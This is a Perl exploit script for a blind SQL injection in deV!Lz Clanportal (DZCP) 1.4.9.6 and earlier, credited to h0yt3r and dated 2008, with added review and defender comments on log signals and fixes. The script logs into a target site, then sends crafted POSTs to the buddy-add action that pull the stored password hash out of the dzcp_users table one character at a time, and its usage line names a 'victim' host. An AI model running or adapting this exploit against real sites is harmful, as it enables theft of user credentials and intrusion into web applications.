deV!Lz Clanportal [DZCP] <= 1.4.9.6 Blind SQL Injection Exploit
来源:www.vfcocus.net 作者:h0yt3r 发布时间:2008-11-03  
use HTTP::Cookies;
use LWP::UserAgent;

# Proof-of-concept client for the blind SQL injection named in the page title
# (deV!Lz Clanportal / DZCP <= 1.4.9.6).  This top-level section:
#   1. builds an HTTP client with a cookie jar so the login session persists;
#   2. logs in with a registered account (the usage text says the affected
#      page is only visible to registered users);
#   3. calls inject() 32 times, each call recovering one character through
#      true/false probes sent by request().
# Defender notes: every request goes to user/index.php, and the extraction
# phase is a burst of POSTs to ?action=buddys&do=addbuddy whose "users" field
# carries SQL text -- both are usable signals in access logs and WAF rules.
# NOTE(review): there is no "use strict"/"use warnings"; every variable not
# declared with "my" is a package global shared with the subs further down.
my $ua    = LWP::UserAgent->new( cookie_jar => HTTP::Cookies->new,);

# Fixed, dated browser string; it is identical on every request sent here.
$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );

# The banner is printed unconditionally, before the arguments are checked.
usage();
print "\n";

# Positional arguments: host, path, account name, account password.
$server =   $ARGV[0];
$dir = $ARGV[1];
$username =   $ARGV[2];
$password = $ARGV[3];

# Only the last argument is tested, and by truth value, so a password of
# "0" or "" is treated as missing.
if (!$password) { die "Argh! Read teh Usage!\n"; }

# All three URLs address the same script; plain http is hard-coded.
$url0 = "http://".$server.$dir."user/index.php";
$url1 = $url0."?action=login&do=yes";
$url2 = $url0."?action=buddys&do=addbuddy";

# syswrite bypasses Perl's output buffering, so progress text shows at once.
syswrite(STDOUT, "[x]Connecting...", 16);

# Initial GET: checks reachability and fetches the page used for the
# captcha test below.
$response = $ua->get($url0);
if($response->is_success) {syswrite(STDOUT, "OK", 2);} else { print "\n[x]Ey I couldn't connect to ".$url0; exit;}
print "\n";

# A captcha is assumed to be required when the page mentions "secure=login".
$captcha = ($response->content =~ m/secure=login/i) ? 1 : 0;

# captcha() stores the operator's answer in the global $imgCode.
if($captcha) { captcha(); }

# Login POST; the "secure" field is added only when a captcha was requested.
$response = (!$captcha) ? $ua->post($url1, [ "user" => $username, "pwd" => $password ]) : $ua->post($url1, [ "user" => $username, "pwd" => $password , "secure" => $imgCode]);

# Login failure is recognised by two words in the response body (they look
# like German UI text -- presumably locale dependent; confirm).
if($response->content =~ m/Sicherheitsscode/i) { print "[x]Lol you gave me wrong image code. Restart!"; exit; }
elsif($response->content =~ m/gesperrt/i) { print "[x]Omg you gave me wrong user details. Restart!"; exit; }

# GET of the target page; the result is overwritten by request() and is
# never inspected.
$response = $ua->get($url2);

print "[x]Kay, unleashing BlackMagic now. Getta Coffee and wait!!\n";

my @Daten;   # candidate characters as two-digit hex codes, filled by array()
array();

my $operator;   # comparison operator of the current probe, set in request()

syswrite(STDOUT, "[x]Password: ", 13);

# $b is the 1-based character position and is read as a global by request().
# 32 positions matches the length of an MD5 hex digest -- presumably the
# format of the stored pwd column; confirm.
for($b=1;$b<=32;$b++) { inject(0,16); }

print "\n[x]OmFg I made it!!\n";
print "[x]Have FUN!\n";
print "[x]Greetz & Shoutz go to: IP-Sh0k, haZl0oh, bizzit, NoNePub, thund3r ,ramon,\n";
print "   J0hn.X3r, electron1x, Paloxus, -tmh- aka B-Baerchi, Nazrek aka Patrick_B, WooMic, codeblu815\n";
print "   Free-Hack, Sys-Flaw, SoH and h4ck-y0u!\n";
print "[x]Biggest Thanks go to Shadowleet aka \$h4d0wl33t who is simply the best at his stuff!";

sub hex_to_ascii($)
{
    # Decode a string of hex digit pairs into the characters they encode.
    # Text that is not part of a two-digit hex pair is passed through as-is.
    my ($hex_text) = @_;

    my $decoded = $hex_text;
    $decoded =~ s{([0-9A-Fa-f]{2})}{chr(hex($1))}ge;

    return $decoded;
}
# Recover the character at position $b (a global set by the caller's loop) by
# binary search over the candidate table @Daten, then print it.
#   $_[0], $_[1] - lowest and highest @Daten index still under consideration.
# Each step asks the server up to two true/false questions: equals($mid) and,
# if that is false, bigger($mid); the answer selects the half to recurse into.
# $beg, $end and $mid are package globals, not lexicals.
# Defender note: on the wire this is a run of near-identical POSTs that differ
# only in one comparison operator and one hex literal.
sub inject
{
    $beg = $_[0]; $end = $_[1];  
    $mid = int(($beg + $end)/2); #print $mid."\n";
    if(&equals($mid))
    {      
        # Match: @Daten holds hex codes, so decode to the character itself.
        syswrite(STDOUT, hex_to_ascii($Daten[$mid]), 1);                
        return;  
    }
    elsif(&bigger($mid)) { return inject($mid + 1, $end); }  
    else { return inject($beg, $mid - 1); }      
}

# True (1) when the "=" probe for candidate index $_[0] comes back without the
# marker "1242" in the body; otherwise there is no explicit return and the
# result is a false value.  $ack is a package global.
sub equals { $ack = $_[0]; if( &request("=", $ack) !~ m/1242/i) { return 1; } }

# Same as equals() but with the ">" operator: true (1) when the response body
# lacks the marker "1242", a false value otherwise.  $ack is a package global.
sub bigger { $ack = $_[0]; if(&request(">", $ack) !~ m/1242/i) { return 1; } }

# Send one true/false probe and return the raw response body.
#   $_[0] - comparison operator ("=" or ">", as passed by equals()/bigger())
#   $_[1] - index into @Daten of the candidate hex code
# The "users" form field carries a SQL fragment.  When the comparison holds,
# the IF() yields NULL; otherwise it evaluates a scalar subquery that returns
# two rows.  1242 is MySQL's "Subquery returns more than 1 row" error code,
# presumably what the page echoes and what equals()/bigger() search for, so
# the oracle relies on the application showing database errors to the client.
# NOTE(review): the server-side code is not on this page.  The payload shape
# (a bare "999 and ...") suggests the value reaches a numeric SQL context
# unquoted; the fix class is integer validation or bound parameters, and
# database error text should not be returned to clients.
# Detection: SQL keywords (select, substring, union) in the "users" POST field
# and repeated error 1242 entries in the database or application log.
sub request
{  
    $operator = $_[0]; $bick = $_[1];                             #probably only users without dzcp_
    $response = $ua->post($url2, [ "users" => "999 and if(substring((select pwd from dzcp_users limit 0,1),".$b.",1)".$operator."0x".$Daten[$bick].",null,(select 1 union select 2))" ]);
    #print $response->content;
    return $response->content;
}

sub usage()
{
    # Banner plus invocation help.  The text is kept as a single literal so
    # the printed output stays exactly as the author wrote it.
    my $help_text = q
    {
    ------------------NON PUBLIC EXPLOIT-----------------
    #####################################################
            deV!L`z Clanportal BlackMagic EXPLOIT        
                  -Exploit coded by h0yt3r-            
     Usage: devilz.pl [Server] [Path] [Username] [Password]
     Sample:                          
     perl devilz.pl www.victim.com /devilz/ h0yt3r 1337

     Exploit requires Username and Password, as the vul-
     nerable file is only visible for registered users!
    #####################################################
    };

    print $help_text;
}

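sub captcha
{
    # Fetch the login captcha image, save it as captcha.jpg in the current
    # directory, open it in the default viewer and read the code typed on
    # STDIN.  The answer is left in the package global $imgCode, which the
    # login POST in the main flow reads.
    #
    # NOTE(review): the image bytes come from the remote server and are
    # opened by whatever application the OS associates with .jpg.
    print "[x]Captcha required!\n";

    # With the sample path from the usage text this URL contains "//" before
    # antispam.php, which appears verbatim in the server's access log.
    $captchaURL = "http://".$server.$dir."/antispam.php?secure=login";
    my $captchaReq= $ua->get($captchaURL);

    # Three-argument open with a lexical handle: the mode can never be taken
    # from the file name, and a failed open or close is reported instead of
    # the image silently going nowhere.
    if (open(my $img_fh, '>', 'captcha.jpg')) {
        binmode $img_fh;
        print {$img_fh} $captchaReq->content;
        close($img_fh) or warn "[x]Could not finish writing captcha.jpg: $!\n";
    }
    else {
        warn "[x]Could not write captcha.jpg: $!\n";
    }

    # "start" is the Windows shell verb; on other systems this call fails.
    system('start captcha.jpg');
    print "[x]Image Code: ";
    $imgCode = <STDIN>;
    $imgCode = '' unless defined $imgCode;   # STDIN closed before any input

    # chomp strips only a trailing newline; chop would also remove the last
    # real character when the input has no newline.
    chomp($imgCode);
}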

sub array
{
    # Fill @Daten with the candidate character codes in ascending order:
    # 30..39 are the hex codes of '0'-'9', 61..66 those of 'a'-'f'.
    # The loop counter is the package global $b, as in the rest of the file.
    foreach my $range ([30, 39], [61, 66]) {
        for ($b = $range->[0]; $b <= $range->[1]; $b++) {
            push(@Daten, $b);
        }
    }
}

 